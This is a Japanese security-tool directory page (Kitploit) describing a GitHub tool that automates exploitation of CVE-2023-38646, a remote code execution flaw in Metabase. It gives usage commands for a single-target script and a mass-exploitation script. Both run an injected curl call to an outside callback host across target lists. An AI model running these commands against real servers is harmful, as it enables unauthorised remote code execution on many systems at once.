Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38646 — CVE-2023-38646として知られるMetabaseエクスプロイト用の自動ツール | Kitploit
ツール/GitHubGitHub/robotmikhro/cve-2023-38646
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubrobotmikhro/cve-2023-38646

CVE-2023-38646

CVE-2023-38646として知られるMetabaseエクスプロイト用の自動ツール

リポジトリを見る
27623年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-38646

CVE-2023-38646として知られるMetabase RCEエクスプロイト用の自動化ツール。詳細(POC、Dork)は https://secry.me/explore/news/metabase-rce-cve-2023-38646/ を参照してください。

single.pyの使い方

CVE-2023-38646-Single Exploit

root@kitploit:~
python3 single.py --url=http://127.0.0.1:8080 --command="curl sub.requestcatcher.com/some-endpoint"

または

root@kitploit:~
python3 single.py -u http://127.0.0.1:8080 -c "curl sub.requestcatcher.com/some-endpoint"

mass.pyの使い方

CVE-2023-38646-Mass Exploit

root@kitploit:~
python3 mass.py -f target.txt -t 10 -c "curl sub.requestcatcher.com/some-endpoint" -o output.txt

または

root@kitploit:~
python3 mass.py --file=target.txt --threads=10 --command="curl sub.requestcatcher.com/some-endpoint" --output="output.txt"

参考POC

  • https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
  • https://blog.calif.io/p/reproducing-cve-2023-38646-metabase
  • https://www.metabase.com/blog/security-advisory
  • Twitter
ツールをダウンロード